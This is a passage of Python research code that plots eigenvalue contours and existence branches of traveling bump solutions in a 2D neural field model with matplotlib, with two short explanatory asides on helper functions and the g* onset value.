5*E**((25 + 4*nu*Pi)**2/(100.*nu**2))*nu*Sqrt(Pi)*Erf(5/(2.*nu) + (2*Pi)/5.)))
if choice == 1:
return L1
return L2
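`L_gauss` is a Mathematica CForm export and assumes capitalized aliases (`Sqrt`, `E`, `Pi`, `Erf`, `Erfc`, `Cosh`) are defined elsewhere in the module. A plausible set of NumPy-based shims (a sketch of the assumed definitions, not necessarily the author's exact ones):

```python
import math
import numpy as np

# Mathematica-style names assumed by L_gauss; scipy.special.erf/erfc
# would also work and are faster on large arrays.
Sqrt = np.sqrt
E = np.e
Pi = np.pi
Cosh = np.cosh
Erf = np.vectorize(math.erf)
Erfc = np.vectorize(math.erfc)
```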
def wave_stbl_2d_gauss():
"""
compute eigenvalue as a function of traveling bump velocity in axial or diagonal directions.
the h function is given to be the negative derivative of the gaussian.
\lambda_1 &= -\frac{\nu}{\int_0^\infty e^{-s} H_1(\nu s, 0) ds} \int_0^\infty e^{-s} \frac{\pa H_1}{\pa x}(\nu s, 0)[e^{-\lambda_1 s}-1]ds,\\
\lambda_2 &= \frac{\nu}{\int_0^\infty e^{-s} H_1(\nu s, 0) ds} \int_0^\infty e^{-s} \frac{\pa H_1}{\pa y}(0, \nu s)[e^{-\lambda_2 s}-1]ds.
"""
fig = plt.figure(figsize=(8,3))
ax = fig.add_subplot(121)
ax2 = fig.add_subplot(122)
nu = np.linspace(.001,2.,100)
lam = np.linspace(-3,.5,100)
nu2 = np.linspace(.001,2.,100)
lam2 = np.linspace(-3,.5,100)
X,Y = np.meshgrid(nu,lam,indexing='xy')
X2,Y2 = np.meshgrid(nu2,lam2,indexing='xy')
#L(nu,lam,choice=1,s0=0,s1=10,sn=101):
z = L_gauss(X,Y)
z2 = L_gauss(X2,Y2,choice=2)
z[z>=5] = 5
z[z<=-5] = -5
z2[z2>=5] = 5
z2[z2<=-5] = -5
ax.plot([0,nu[-1]],[0,0],color='gray')
ax2.plot([0,nu2[-1]],[0,0],color='gray')
cs = ax.contour(X,Y,z,levels=[-0.00001,0.,.00001])
cs2 = ax2.contour(X2,Y2,z2,levels=[-0.00001,0.,.00001])
#cs = ax.contour(X,Y,z)
#cs2 = ax2.contour(X2,Y2,z2)
# remove other curves
# customize desired curve
cs.collections[0].set_color('black')
cs.collections[1].set_color('black')
cs.collections[2].set_color('black')
cs2.collections[0].set_color('black')
cs2.collections[1].set_color('black')
cs2.collections[2].set_color('black')
cs.collections[1].set_linewidth(2)
cs2.collections[1].set_linewidth(2)
ax.set_xlabel(r'$\nu$')
ax2.set_xlabel(r'$\nu$')
ax.set_ylabel(r'$\lambda_1$')
ax2.set_ylabel(r'$\lambda_2$')
return fig
def wave_exist_2d(choice='axial'):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
"""
nc1x = np.loadtxt('twod_wave_exist_nc_g=1x.dat')
nc1y = np.loadtxt('twod_wave_exist_nc_g=1y.dat')
nc2x = np.loadtxt('twod_wave_exist_nc_g=3x.dat')
nc2y = np.loadtxt('twod_wave_exist_nc_g=3y.dat')
# nc1 bifurcation values
bif = np.loadtxt('twod_wave_exist_br1.dat')
#bif2 = np.loadtxt('twod_wave_exist_br2.dat')
bif_diag1 = np.loadtxt('twod_wave_exist_diag1.dat')
bif_diag2 = np.loadtxt('twod_wave_exist_diag2.dat')
# clean
nc1xx,nc1xy = clean(nc1x[:,0],nc1x[:,1],tol=.05)
nc1yx,nc1yy = clean(nc1y[:,0],nc1y[:,1],tol=.05)
nc2xx,nc2xy = clean(nc2x[:,0],nc2x[:,1],tol=.1)
nc2yx,nc2yy = clean(nc2y[:,0],nc2y[:,1],tol=.1)
bifx,bify = clean(bif[:,3],bif[:,7],tol=1)
bifx2,bify2 = clean(bif[:,3],bif[:,8],tol=.2)
bif_diag1x,bif_diag1y = clean(bif_diag1[:,0],np.abs(bif_diag1[:,1]),tol=.2)
bif_diag2x,bif_diag2y = clean(bif_diag2[:,0],np.abs(bif_diag2[:,1]),tol=.2)
fig = plt.figure(figsize=(8,3))
ax1 = fig.add_subplot(121)
ax1.plot(nc1xx,nc1xy)
ax1.plot(nc1yx,nc1yy)
ax1.plot(nc2xx,nc2xy)
ax1.plot(nc2yx,nc2yy)
#ax1.plot(nc2yx,nc2yy)
ax1.annotate(r'$g=1$',
xy=(.21, .21), xycoords='data',
xytext=(.3, .75), textcoords='data',
size=12,
zorder=2,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate(r'$g=3$',
xy=(.934, 1.37), xycoords='data',
xytext=(1.3, 1.7), textcoords='data',
size=12,
zorder=2,
verticalalignment='top',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate(r'$g=3$',
alpha=0.0,
xy=(1.16, 1.16), xycoords='data',
xytext=(1.3, 1.7), textcoords='data',
size=12,
zorder=2,
verticalalignment='top',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate(r'$g=3$',
alpha=0.0,
xy=(1.379,.923), xycoords='data',
xytext=(1.3, 1.7), textcoords='data',
size=12,
zorder=2,
verticalalignment='top',
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
axins1 = inset_axes(ax1,
width="30%",
height="30%",
loc=8)
mark_inset(ax1, axins1, loc1=2, loc2=4, fc="none", ec="0.5")
axins1.plot(nc1xx,nc1xy)
axins1.plot(nc1yx,nc1yy)
axins1.set_xlim(.1,.3)
axins1.set_ylim(.1,.3)
#mark_inset(ax21, axins21, loc1=2, loc2=1, fc="none", ec="0.5")
plt.xticks(visible=False)
plt.yticks(visible=False)
ax2 = fig.add_subplot(122)
ax2.plot(bifx,bify,color='black')
ax2.plot(bifx2,bify2,color='black')
ax2.plot(bif_diag1x,bif_diag1y,color='black')
ax2.plot(bif_diag2x,bif_diag2y,color='black')
ax2.plot([0,5],[0,0],color='black')
ax2.annotate(r'$x$-axis direction',
xy=(1.04,.37),xycoords='data',textcoords='data',
xytext=(.6,.6),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(1.0,.0),xycoords='data',textcoords='data',
xytext=(.55,.33),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.9,.0),xycoords='data',textcoords='data',
xytext=(.8,.05),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal',
xy=(1.1,.32),xycoords='data',textcoords='data',
xytext=(1.4,.2),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.4,.41),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,.62),xycoords='data',textcoords='data',
xytext=(1.5,.34),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
"""
import matplotlib.patches as patches
ax2.add_patch(
patches.Rectangle(
(1.17,-3),1,6,
color='red',
alpha=.25
)
)
"""
ax2.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.plot([1.17,1.17],[-3,3],color='gray')
ax2.plot([3.,3.],[-3,3],color='gray')
ax1.set_ylabel(r'$\nu_2$')
ax1.set_xlabel(r'$\nu_1$')
ax2.set_ylabel(r'$\nu_1$')
ax2.set_xlabel(r'$g$')
ax1.set_xlim(-.05,2.)
ax1.set_ylim(-.05,2.)
ax2.set_xlim(.5,2.)
ax2.set_ylim(-.1,1)
return fig
def wave_exist_2d_v2(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g
"""
plane1_z = 0.55
plane2_z = 0.889
g = np.linspace(0+.0*1j,2+0.*1j,1000)
# nu1 branches
L1 = Sqrt(-1 + 1.8*g)
L2 = Sqrt(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))/(2.*Sqrt(2))
L3 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L4 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L5 = 0.*g
# nu2 branches
M1 = 0.*g
M2 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))))/(2.*Sqrt(2)*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M3 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M4 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M5 = Sqrt(-1 + 1.8*g)
print(M2)
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
# get plane intersection idx
g_int_p1 = np.argmin(np.abs(g-plane1_z))
g_int_p2 = np.argmin(np.abs(g-plane2_z))
ax1.scatter(L1[g_int_p1],g[g_int_p1],M1[g_int_p1],color='black',s=20)
ax1.scatter(L1[g_int_p2],g[g_int_p2],M1[g_int_p2],color='black',s=20)
ax1.scatter(L2[g_int_p1],g[g_int_p1],M2[g_int_p1],color='black',s=20)
ax1.scatter(L2[g_int_p2],g[g_int_p2],M2[g_int_p2],color='black',s=20)
ax1.scatter(L3[g_int_p1],g[g_int_p1],M3[g_int_p1],color='black',s=20)
ax1.scatter(L3[g_int_p2],g[g_int_p2],M3[g_int_p2],color='black',s=20)
ax1.scatter(L4[g_int_p1],g[g_int_p1],M4[g_int_p1],color='black',s=20)
ax1.scatter(L4[g_int_p2],g[g_int_p2],M4[g_int_p2],color='black',s=20)
# plot curves in 3d
ax1.plot(L1,g,M1,color='black',lw=2)
ax1.plot(L2,g,M2,color='black',lw=2)
ax1.plot(L3,g,M3,color='black',lw=2)
ax1.plot(L4,g,M4,color='black',lw=2)
ax1.plot(L5,g,M5,color='black',lw=2)
# plot curves in 2d
ax2.plot(g,L1,color='black',lw=2)
ax2.plot(g,L2,color='black',lw=2)
ax2.plot(g,L3,color='black',lw=2)
ax2.plot(g,L4,color='black',lw=2)
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(g[0],g[-1],10),np.linspace(g[0],g[-1],10))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.3,color='gray')
ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.3,color='red')
# plot bifurcation lines
ax2.plot([plane1_z,plane1_z],[0,1.8],color='black',alpha=.5,lw=2)
ax2.plot([plane2_z,plane2_z],[0,1.8],color='red',alpha=.5,lw=2)
#ax1.plot([0,5],[0,0],color='black')
ax2.annotate(r'$x$-axis direction',
xy=(.65,.4),xycoords='data',textcoords='data',
xytext=(.2,1.1),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(1.4,.0),xycoords='data',textcoords='data',
xytext=(1.3,.3),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.55,.0),xycoords='data',textcoords='data',
xytext=(.4,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal',
xy=(1.6,1.05),xycoords='data',textcoords='data',
xytext=(1.6,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.4,.63),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,1.14),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.view_init(20,-8)
#ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.set_xlabel(r'$\nu_2$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_1$')
ax2.set_xlabel(r'$g$')
ax2.set_ylabel(r'$\nu_1$')
ax1.set_xlim(0,2.)
ax1.set_ylim(0,2.)
ax1.set_zlim(-.1,1.8)
plt.show()
return fig
def wave_exist_2d_trunc(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
"""
g = np.linspace(.0,2,1000)
L1 = Sqrt(-1 + 1.8*g)
L2 = Sqrt(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))/(2.*Sqrt(2))
L3 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L4 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
fig = plt.figure(figsize=(5,3))
ax1 = fig.add_subplot(111)
ax1.plot(g,L1,color='black')
ax1.plot(g,L2,color='black')
ax1.plot(g,L3,color='black')
ax1.plot(g,L4,color='black')
ax1.plot([0,5],[0,0],color='black')
ax1.annotate(r'$x$-axis direction',
xy=(.65,.4),xycoords='data',textcoords='data',
xytext=(.2,1.1),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate(r'$y$-axis direction',
xy=(1.4,.0),xycoords='data',textcoords='data',
xytext=(1.3,.3),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate(r'$g^*$',
xy=(.55,.0),xycoords='data',textcoords='data',
xytext=(.4,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate('Diagonal',
xy=(1.6,1.05),xycoords='data',textcoords='data',
xytext=(1.6,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate('Off-diagonal',
xy=(1.4,.63),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,1.14),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.set_ylabel(r'$\nu_1$')
ax1.set_xlabel(r'$g$')
ax1.set_xlim(0,2.)
ax1.set_ylim(-.1,1.8)
return fig
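The `g^*` annotation in the figure above marks the onset of the axial traveling branch: in the truncated system the x-axis branch nu_1 = Sqrt(-1 + 1.8*g) is real only for g >= 1/1.8 = 5/9 ~ 0.556, consistent with the label placed near g ~ 0.55. A quick numerical check of that onset:

```python
import numpy as np

g = np.linspace(0., 2., 2001)
nu1_sq = -1. + 1.8*g                  # square of the x-axis branch nu_1
g_star = g[np.argmax(nu1_sq >= 0.)]   # first g with a real branch
```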
def wave_exist_2d_trunc_v2(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g
"""
plane1_z = 0.55
plane2_z = 0.889
g = np.linspace(0+.0*1j,2+0.*1j,1000)
# nu1 branches
L1 = Sqrt(-1 + 1.8*g)
L2 = Sqrt(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))/(2.*Sqrt(2))
L3 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L4 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L5 = 0.*g
# nu2 branches
M1 = 0.*g
M2 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))))/(2.*Sqrt(2)*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M3 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M4 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M5 = Sqrt(-1 + 1.8*g)
print(M2)
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
# get plane intersection idx
g_int_p1 = np.argmin(np.abs(g-plane1_z))
g_int_p2 = np.argmin(np.abs(g-plane2_z))
ax1.scatter(L1[g_int_p1],g[g_int_p1],M1[g_int_p1],color='black',s=20)
ax1.scatter(L1[g_int_p2],g[g_int_p2],M1[g_int_p2],color='black',s=20)
ax1.scatter(L2[g_int_p1],g[g_int_p1],M2[g_int_p1],color='black',s=20)
ax1.scatter(L2[g_int_p2],g[g_int_p2],M2[g_int_p2],color='black',s=20)
ax1.scatter(L3[g_int_p1],g[g_int_p1],M3[g_int_p1],color='black',s=20)
ax1.scatter(L3[g_int_p2],g[g_int_p2],M3[g_int_p2],color='black',s=20)
ax1.scatter(L4[g_int_p1],g[g_int_p1],M4[g_int_p1],color='black',s=20)
ax1.scatter(L4[g_int_p2],g[g_int_p2],M4[g_int_p2],color='black',s=20)
# plot curves in 3d
ax1.plot(L1,g,M1,color='black',lw=2)
ax1.plot(L2,g,M2,color='black',lw=2)
ax1.plot(L3,g,M3,color='black',lw=2)
ax1.plot(L4,g,M4,color='black',lw=2)
ax1.plot(L5,g,M5,color='black',lw=2)
# plot curves in 2d
ax2.plot(g,L1,color='black',lw=2)
ax2.plot(g,L2,color='black',lw=2)
ax2.plot(g,L3,color='black',lw=2)
ax2.plot(g,L4,color='black',lw=2)
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(g[0],g[-1],10),np.linspace(g[0],g[-1],10))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.3,color='gray')
ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.3,color='red')
# plot bifurcation lines
ax2.plot([plane1_z,plane1_z],[0,1.8],color='black',alpha=.5,lw=2)
ax2.plot([plane2_z,plane2_z],[0,1.8],color='red',alpha=.5,lw=2)
#ax1.plot([0,5],[0,0],color='black')
ax2.annotate(r'$x$-axis direction',
xy=(.65,.4),xycoords='data',textcoords='data',
xytext=(.2,1.1),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$y$-axis direction',
xy=(1.4,.0),xycoords='data',textcoords='data',
xytext=(1.3,.3),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate(r'$g^*$',
xy=(.55,.0),xycoords='data',textcoords='data',
xytext=(.4,.07),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Diagonal',
xy=(1.6,1.05),xycoords='data',textcoords='data',
xytext=(1.6,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
xy=(1.4,.63),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Off-diagonal',
alpha=0.,
xy=(1.4,1.14),xycoords='data',textcoords='data',
xytext=(1.3,1.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax2.annotate('Multiple non-axial directions',xy=(3.68,.1),xycoords='data',textcoords='data',xytext=(3.,.5),
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3",
color='black'),
)
ax1.view_init(20,-8)
#ax1.plot([.89,.89],[-3,3],color='gray')
#ax1.plot([3.,3.],[-3,3],color='gray')
ax1.set_xlabel(r'$\nu_2$')
ax1.set_ylabel(r'$g$')
ax1.set_zlabel(r'$\nu_1$')
ax2.set_xlabel(r'$g$')
ax2.set_ylabel(r'$\nu_1$')
ax1.set_xlim(0,2.)
ax1.set_ylim(0,2.)
ax1.set_zlim(-.1,1.8)
plt.show()
return fig
def wave_exist_2d_trunc_v3(b=.8):
"""
plot zeros of -nu1 + G(nu1,nu2) and -nu2 + G(nu2,nu1)
as a function of g
"""
plane1_z = 0.53
plane2_z = 0.88
g = np.linspace(0+.0*1j,1.5+0.*1j,100)
# nu1 branches
L1 = Sqrt(-1 + 1.8*g)
L2 = Sqrt(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))/(2.*Sqrt(2))
L3 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L4 = Sqrt(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + \
Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + \
2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))/2.
L5 = 0.*g
# nu2 branches
M1 = 0.*g
M2 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-5 + (4 + b)*g + Sqrt(9 + 6*(-4 + b)*g + (4 + b)**2*g**2))))/(2.*Sqrt(2)*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M3 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) + Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M4 = np.real(Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)*(-6 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2) - Sqrt(-4*(-5 + Sqrt(16 + (2 + b)**2*g**2)) + 2*g*(-4 + b*(-2 + (2 + b)*g + Sqrt(16 + (2 + b)**2*g**2)))))))/(2.*Sqrt(-(g**3*(2 + g)*(5*(6 + b) + (1 + b)*(8 + 3*b)*g)))))
M5 = Sqrt(-1 + 1.8*g)
fig = plt.figure(figsize=(10,5))
ax1 = fig.add_subplot(121, projection='3d')
ax2 = fig.add_subplot(122)
# get plane intersection idx
g_int_p1 = np.argmin(np.abs(g-plane1_z))
g_int_p2 = np.argmin(np.abs(g-plane2_z))
# plot curves in 3d
# prep for plotting with different line widths
# add modified curves to figure
ax1.add_collection3d(collect3d_colorgrad(L1,g,M1))
ax1.add_collection3d(collect3d_colorgrad(L2,g,M2))
ax1.add_collection3d(collect3d_colorgrad(L3,g,M3))
ax1.add_collection3d(collect3d_colorgrad(L4,g,M4))
ax1.add_collection3d(collect3d_colorgrad(L5,g,M5))
# plot bifurcation planes
X,Y = np.meshgrid(np.linspace(0,1.2,10),np.linspace(0,1.2,10))
ax1.plot_surface(X,0.*X+plane1_z,Y,alpha=.2,color='gray')
ax1.plot_surface(X,0.*X+plane2_z,Y,alpha=.2,color='red')
# plot intersection points
# ax1.scatter(L1[g_int_p1],g[g_int_p1],M1[g_int_p1],color='black',s=30)
ax1.plot([M3[g_int_p1]],[g[g_int_p1]],[L3[g_int_p1]],color='black',marker='o',markersize=8,zorder=10)
#ax1.scatter(L1[g_int_p2],g[g_int_p2],M1[g_int_p2],color='red',s=30)
ax1.plot([np.real(L1[g_int_p2])],[np.real(g[g_int_p2])],[np.real(M1[g_int_p2])],marker='o',markersize=8,markeredgecolor='none',zorder=100,color='red')
ax1.plot([L2[g_int_p1]],[g[g_int_p1]],[M2[g_int_p1]],color='black',marker='o',markersize=8,zorder=10)
#ax1.scatter(L2[g_int_p1],g[g_int_p1],M2[g_int_p1],color='black',s=35)
ax1.plot([L2[g_int_p2]],[g[g_int_p2]],[M2[g_int_p2]],marker='o',markersize=7,markeredgecolor='none',zorder=100,color='red')
ax1.plot([L3[g_int_p1]],[g[g_int_p1]],[M3[g_int_p1]],color='black',marker='o',markersize=8,zorder=10)
ax1.scatter(L3[g_int_p1],g[g_int_p1],M3[g_int_p1],color='black',s=30)
ax1.plot([L3[g_int_p2]],[g[g_int_p2]],[M3[g_int_p2]],marker='o',markersize=6,markeredgecolor='none',zorder=100,color='red')
#ax1.scatter(L4[g_int_p1],g[g_int_p1],M4[g_int_p1],color='black',s=30)
#ax1.scatter(L4[g_int_p2],g[g_int_p2],M4[g_int_p2],color='red',s=30)
# plot curves in 2d + 2d projection in 3d plot
#ax2.plot([L1[g_int_p1],M1[g_int_p1]],color='black',marker='o',markersize=8,zorder=10)
#ax2.scatter(L1[g_int_p2],M1[g_int_p2],color='red',s=50,zorder=10)
ax1.plot([L1[g_int_p1]],[1.5],[M1[g_int_p1]],marker='o',markeredgecolor='none',color='black',markersize=8,zorder=100)
ax1.plot([L1[g_int_p2]],[1.5],[M1[g_int_p2]],marker='o',markeredgecolor='none',color='red',markersize=8,zorder=100)
ax2.plot([L2[g_int_p1]],[M2[g_int_p1]],color='black',marker='o',markersize=8)
ax2.scatter(L2[g_int_p2],M2[g_int_p2],color='red',s=70,zorder=10)
ax1.plot([L2[g_int_p1]],[1.5],[M2[g_int_p1]],marker='o',markeredgecolor='none',color='black',markersize=8,zorder=100)
ax1.plot([L2[g_int_p2]],[1.5],[M2[g_int_p2]],marker='o',markeredgecolor='none',color='red',markersize=8,zorder=100)
ax2.scatter(L3[g_int_p1],M3[g_int_p1],color='black',s=70,zorder=10)
ax2.scatter(L3[g_int_p2],M3[g_int_p2],color='red',s=70,zorder=10)
ax1.plot([L3[g_int_p1]],[1.5],[M3[g_int_p1]],marker='o',markeredgecolor='none',color='black',markersize=8,zorder=100)
ax1.plot([L3[g_int_p2]],[1.5],[M3[g_int_p2]],marker='o',markeredgecolor='none',color='red',markersize=8,zorder=100)
ax2.scatter(L4[g_int_p1],M4[g_int_p1],color='black',s=70,zorder=10)
ax2.scatter(L4[g_int_p2],M4[g_int_p2],color='red',s=70,zorder=10)
